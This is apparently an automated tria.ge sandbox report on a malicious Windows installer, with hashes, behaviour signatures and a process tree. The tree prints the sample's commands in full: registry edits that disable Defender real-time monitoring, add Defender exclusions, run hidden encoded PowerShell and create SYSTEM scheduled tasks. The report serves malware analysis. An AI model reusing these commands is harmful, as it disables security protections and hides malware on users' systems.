Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    210s
  • max time network
    213s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    25/07/2024, 22:40

General

  • Target

    6f39bd9791dd149c4f83212e94f8a5b5879f9caad66f5af12c7d0cb0061ff9df.exe

  • Size

    7.2MB

  • MD5

    5a947cdd8ca2d0506b8591a0b242e8bb

  • SHA1

    64616f9d603727d28c6bffc2b88e616caff2acca

  • SHA256

    6f39bd9791dd149c4f83212e94f8a5b5879f9caad66f5af12c7d0cb0061ff9df

  • SHA512

    79c133cc3604c318d53e700ba4df996bbc0c64013f347a3b10cf3df01ee506829ac918f717fca553e94fbb471afe6537cae7ec1499eabe3027c5775f2d687ab4

  • SSDEEP

    196608:91O2mhc5SKyAekYT/FONVsA9LV2SENcjoMIKT6/in5sUaYgW6:3O2m6SKkkYT/EAAdQSEijoMI+4i5sUJ0

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 19 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6f39bd9791dd149c4f83212e94f8a5b5879f9caad66f5af12c7d0cb0061ff9df.exe
    "C:\Users\Admin\AppData\Local\Temp\6f39bd9791dd149c4f83212e94f8a5b5879f9caad66f5af12c7d0cb0061ff9df.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2284
    • C:\Users\Admin\AppData\Local\Temp\7zSE6A7.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:316
      • C:\Users\Admin\AppData\Local\Temp\7zSEB49.tmp\Install.exe
        .\Install.exe /kTSgididMP "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2624
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3032
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2700
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2056
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                  PID:2456
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2764
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2448
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:2444
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              PID:2676
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                6⤵
                  PID:2556
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                    7⤵
                    • System Location Discovery: System Language Discovery
                    PID:2468
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                5⤵
                • Indirect Command Execution
                • System Location Discovery: System Language Discovery
                PID:2532
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:2476
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                    7⤵
                      PID:2420
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  5⤵
                  • Indirect Command Execution
                  • System Location Discovery: System Language Discovery
                  PID:2416
                  • C:\Windows\SysWOW64\cmd.exe
                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                    6⤵
                      PID:2440
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2472
                        • C:\Windows\SysWOW64\gpupdate.exe
                          "C:\Windows\system32\gpupdate.exe" /force
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:2436
                • C:\Windows\SysWOW64\forfiles.exe
                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                  4⤵
                  • Indirect Command Execution
                  PID:2788
                  • C:\Windows\SysWOW64\cmd.exe
                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                    5⤵
                      PID:1924
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                        6⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1852
                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                          7⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1940
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /CREATE /TN "bIYlhJRHReAjNrjZjW" /SC once /ST 22:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\RwdoDobYYmMYJBBuk\fsdVjKAiVQIQmKO\QnBxlED.exe\" Hz /oldiduf 525403 /S" /V1 /F
                    4⤵
                    • Drops file in Windows directory
                    • Scheduled Task/Job: Scheduled Task
                    PID:2232
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 604
                    4⤵
                    • Loads dropped DLL
                    • Program crash
                    PID:2904
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {F18718B4-F552-4C2D-9DB7-1F62CE0C2690} S-1-5-18:NT AUTHORITY\System:Service:
              1⤵
                PID:1964
                • C:\Users\Admin\AppData\Local\Temp\RwdoDobYYmMYJBBuk\fsdVjKAiVQIQmKO\QnBxlED.exe
                  C:\Users\Admin\AppData\Local\Temp\RwdoDobYYmMYJBBuk\fsdVjKAiVQIQmKO\QnBxlED.exe Hz /oldiduf 525403 /S
                  2⤵
                  • Executes dropped EXE
                  • Drops file in System32 directory
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:2952
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                    3⤵
                      PID:1756
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                        4⤵
                        • Indirect Command Execution
                        • System Location Discovery: System Language Discovery
                        PID:2896
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                          5⤵
                            PID:2888
                            • \??\c:\windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                              6⤵
                                PID:2516
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                            4⤵
                            • Indirect Command Execution
                            PID:2280
                            • C:\Windows\SysWOW64\cmd.exe
                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:304
                              • \??\c:\windows\SysWOW64\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                6⤵
                                  PID:1016
                            • C:\Windows\SysWOW64\forfiles.exe
                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                              4⤵
                              • Indirect Command Execution
                              PID:1672
                              • C:\Windows\SysWOW64\cmd.exe
                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:800
                                • \??\c:\windows\SysWOW64\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                  6⤵
                                    PID:1736
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                4⤵
                                • Indirect Command Execution
                                • System Location Discovery: System Language Discovery
                                PID:2068
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                  5⤵
                                    PID:1632
                                    • \??\c:\windows\SysWOW64\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                      6⤵
                                        PID:2104
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                    4⤵
                                    • Indirect Command Execution
                                    • System Location Discovery: System Language Discovery
                                    PID:2096
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2064
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                        6⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in System32 directory
                                        • System Location Discovery: System Language Discovery
                                        • Modifies data under HKEY_USERS
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1144
                                        • C:\Windows\SysWOW64\gpupdate.exe
                                          "C:\Windows\system32\gpupdate.exe" /force
                                          7⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:1288
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /CREATE /TN "gLjQNlIeM" /SC once /ST 13:38:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                  3⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:340
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /run /I /tn "gLjQNlIeM"
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2832
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /DELETE /F /TN "gLjQNlIeM"
                                  3⤵
                                    PID:2012
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                    3⤵
                                      PID:2168
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                        4⤵
                                        • Modifies Windows Defender Real-time Protection settings
                                        PID:2852
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                      3⤵
                                        PID:1248
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                          4⤵
                                          • Modifies Windows Defender Real-time Protection settings
                                          • System Location Discovery: System Language Discovery
                                          PID:2600
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /CREATE /TN "guKQszkut" /SC once /ST 16:50:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                        3⤵
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:1596
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /run /I /tn "guKQszkut"
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2300
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /DELETE /F /TN "guKQszkut"
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2472
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                        3⤵
                                        • Indirect Command Execution
                                        PID:3032
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                          4⤵
                                            PID:2664
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                              5⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Drops file in System32 directory
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2784
                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                6⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1520
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EVEUCunQCfdKYNhg" /t REG_DWORD /d 0 /reg:32
                                          3⤵
                                            PID:1480
                                            • C:\Windows\SysWOW64\reg.exe
                                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EVEUCunQCfdKYNhg" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1924
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EVEUCunQCfdKYNhg" /t REG_DWORD /d 0 /reg:64
                                            3⤵
                                              PID:2920
                                              • C:\Windows\SysWOW64\reg.exe
                                                REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EVEUCunQCfdKYNhg" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                • Windows security bypass
                                                • System Location Discovery: System Language Discovery
                                                PID:484
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EVEUCunQCfdKYNhg" /t REG_DWORD /d 0 /reg:32
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:1624
                                              • C:\Windows\SysWOW64\reg.exe
                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EVEUCunQCfdKYNhg" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                  PID:3040
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EVEUCunQCfdKYNhg" /t REG_DWORD /d 0 /reg:64
                                                3⤵
                                                  PID:888
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EVEUCunQCfdKYNhg" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                      PID:2228
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /C copy nul "C:\Windows\Temp\EVEUCunQCfdKYNhg\vnOTPvlE\VJtZCnUdVvLJZCcy.wsf"
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1780
                                                  • C:\Windows\SysWOW64\wscript.exe
                                                    wscript "C:\Windows\Temp\EVEUCunQCfdKYNhg\vnOTPvlE\VJtZCnUdVvLJZCcy.wsf"
                                                    3⤵
                                                    • Modifies data under HKEY_USERS
                                                    PID:1908
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FFmoqIwyCFUn" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                      • Windows security bypass
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2188
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FFmoqIwyCFUn" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                      • Windows security bypass
                                                      PID:2480
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KfUtAOroJmGU2" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                      • Windows security bypass
                                                      PID:2892
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KfUtAOroJmGU2" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                      • Windows security bypass
                                                      PID:300
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QcGCGayyaPLLC" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                      • Windows security bypass
                                                      PID:1668
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QcGCGayyaPLLC" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                      • Windows security bypass
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1672
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ipKryXWWU" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                      • Windows security bypass
                                                      PID:3052
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ipKryXWWU" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                      • Windows security bypass
                                                      • System Location Discovery: System Language Discovery
                                                      PID:444
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sJWGOJOeniRHVrLuwjR" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                      • Windows security bypass
                                                      PID:2064
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sJWGOJOeniRHVrLuwjR" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                      • Windows security bypass
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2460
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\coeVQdnlUzEFEwVB" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                      • Windows security bypass
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2216
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\coeVQdnlUzEFEwVB" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                      • Windows security bypass
                                                      PID:340
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                      • Windows security bypass
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2832
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                      • Windows security bypass
                                                      PID:1804
                                                    • C:\Windows\SysWOW64\reg.exe
